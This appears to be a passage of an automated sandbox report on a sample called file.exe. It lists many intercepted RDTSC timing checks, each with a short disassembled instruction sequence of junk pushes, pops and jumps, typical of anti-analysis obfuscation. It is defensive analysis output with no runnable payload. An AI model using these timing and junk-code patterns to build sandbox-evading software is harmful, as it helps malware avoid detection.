                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13563E6 second address: 1356417 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F15490E9B93h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F15490E9B95h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1356417 second address: 135641C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135641C second address: 135643A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F15490E9B93h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135643A second address: 135643E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135643E second address: 1356444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13565EF second address: 13565F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13565F3 second address: 1356603 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F15490E9B86h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135694A second address: 1356959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1548D0B2F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1356959 second address: 135695D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1356D60 second address: 1356D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1356D64 second address: 1356D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F2C9 second address: 135F2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1548D0B2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F2D3 second address: 135F2FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B8Ch 0x00000007 jno 00007F15490E9B86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F15490E9B91h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135EE48 second address: 135EE98 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F1548D0B306h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c js 00007F1548D0B32Dh 0x00000012 js 00007F1548D0B30Ch 0x00000018 jmp 00007F1548D0B306h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F1548D0B2FFh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136D887 second address: 136D88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136D88B second address: 136D891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136D891 second address: 136D897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136D897 second address: 136D8A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1548D0B2FBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136D8A6 second address: 136D8CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F15490E9B96h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F15490E9B86h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13703B0 second address: 13703B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137222A second address: 1372230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372230 second address: 1372251 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1548D0B303h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372251 second address: 1372255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372255 second address: 137225D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137225D second address: 1372266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389813 second address: 1389819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389819 second address: 138981F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138981F second address: 1389824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389824 second address: 1389832 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13899CA second address: 13899CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389AFA second address: 1389AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389AFE second address: 1389B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389B04 second address: 1389B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F15490E9B88h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389B12 second address: 1389B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B308h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389B32 second address: 1389B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389F61 second address: 1389F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389F65 second address: 1389F74 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F15490E9B86h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138DC8A second address: 138DCAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1548D0B304h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F1548D0B2F6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138DCAD second address: 138DCB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138D965 second address: 138D9A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B2FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F1548D0B302h 0x0000000f push ebx 0x00000010 js 00007F1548D0B2F6h 0x00000016 pop ebx 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007F1548D0B2FFh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138F371 second address: 138F377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138F377 second address: 138F386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F1548D0B2F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138F386 second address: 138F38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138F38A second address: 138F38E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138F38E second address: 138F394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138F394 second address: 138F3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007F1548D0B2F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138F3A8 second address: 138F3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139F2AD second address: 139F2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139F2B2 second address: 139F2CC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F15490E9B90h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139F2CC second address: 139F2D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ABA7E second address: 13ABA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ABA82 second address: 13ABAC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1548D0B309h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F1548D0B2FAh 0x00000010 jbe 00007F1548D0B312h 0x00000016 jmp 00007F1548D0B306h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB519 second address: 13AB530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB530 second address: 13AB534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB534 second address: 13AB53E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15490E9B86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB53E second address: 13AB544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB544 second address: 13AB55F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB55F second address: 13AB56B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB56B second address: 13AB56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB6DB second address: 13AB6F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B2FDh 0x00000007 jnp 00007F1548D0B2F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB6F2 second address: 13AB70D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15490E9B97h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB70D second address: 13AB717 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1548D0B2F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AD430 second address: 13AD44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F15490E9B92h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD257 second address: 13BD267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F1548D0B2FBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD267 second address: 13BD285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jmp 00007F15490E9B8Eh 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD285 second address: 13BD289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD710 second address: 13BD72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F15490E9B97h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD72C second address: 13BD743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B301h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD743 second address: 13BD754 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD754 second address: 13BD75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD75A second address: 13BD78B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B94h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F15490E9B94h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD78B second address: 13BD7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1548D0B306h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BDBAF second address: 13BDBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jc 00007F15490E9BCCh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BDBC2 second address: 13BDBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BDD5C second address: 13BDD63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0D69 second address: 13C0D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0D6D second address: 13C0D77 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0D77 second address: 13C0E30 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1548D0B303h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F1548D0B2F8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D2896h], ecx 0x0000002d push 00000004h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F1548D0B2F8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D2325h], esi 0x0000004f call 00007F1548D0B2F9h 0x00000054 jmp 00007F1548D0B2FAh 0x00000059 push eax 0x0000005a jmp 00007F1548D0B2FEh 0x0000005f mov eax, dword ptr [esp+04h] 0x00000063 pushad 0x00000064 pushad 0x00000065 push edx 0x00000066 pop edx 0x00000067 jmp 00007F1548D0B2FEh 0x0000006c popad 0x0000006d jnp 00007F1548D0B2FCh 0x00000073 popad 0x00000074 mov eax, dword ptr [eax] 0x00000076 pushad 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1046 second address: 13C104C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C104C second address: 13C1050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1050 second address: 13C108C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D36CBh], ecx 0x0000000f push dword ptr [ebp+122D2D2Bh] 0x00000015 stc 0x00000016 call 00007F15490E9B89h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F15490E9B99h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C108C second address: 13C109E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B2FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C109E second address: 13C10A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C10A4 second address: 13C10A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C10A8 second address: 13C10EA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007F15490E9B99h 0x00000014 pop edx 0x00000015 pop edx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b jmp 00007F15490E9B90h 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5E8A second address: 13C5EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007F1548D0B30Dh 0x0000000b jmp 00007F1548D0B307h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E0335 second address: 57E0339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E0339 second address: 57E033F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E033F second address: 57E0345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E0345 second address: 57E0369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F1548D0B2FAh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1548D0B2FAh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E0369 second address: 57E036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E036D second address: 57E0373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E0373 second address: 57E039E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F15490E9B90h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E039E second address: 57E03BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E03F3 second address: 57E0474 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F15490E9B8Ch 0x00000011 and ecx, 254EC378h 0x00000017 jmp 00007F15490E9B8Bh 0x0000001c popfd 0x0000001d movzx ecx, dx 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007F15490E9B92h 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F15490E9B90h 0x0000002d mov ebp, esp 0x0000002f jmp 00007F15490E9B90h 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a mov bh, 0Dh 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E0474 second address: 57E047A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
